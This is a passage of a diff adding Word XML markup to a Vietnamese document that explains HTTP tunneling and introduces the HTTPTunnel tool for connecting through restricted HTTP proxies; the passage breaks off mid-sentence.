+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hầm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>liên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trực</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tiếp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>giữa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vị</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trí</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Tunnel </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vận</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chuyển</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> foreign protocol qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mà</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hỗ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trợ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Bạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lấy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>giao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thức</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bọc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đặt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vào</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hầm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>giao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thức</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> B.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="5000" w:type="pct"/>
+        <w:tblCellSpacing w:w="22" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9360"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="300"/>
+          <w:tblCellSpacing w:w="22" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+            <w:tcMar>
+              <w:top w:w="0" w:type="dxa"/>
+              <w:left w:w="75" w:type="dxa"/>
+              <w:bottom w:w="0" w:type="dxa"/>
+              <w:right w:w="0" w:type="dxa"/>
+            </w:tcMar>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>Giới</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>thiệu</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>về</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>HTTPTunnel</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="22" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>HTTPTunnel</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>là</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>một</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>phần</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>mềm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>đường</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>hầm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>có</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>thể</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>tạo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>đường</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>hầm</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>kết</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>nối</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>mạng</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>thông</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> qua </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>các</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> proxy HTTP </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>hạn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>chế</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+                <w:sz w:val="17"/>
+                <w:szCs w:val="17"/>
+              </w:rPr>
+              <w:t>đối</w:t>
+            </w:r>
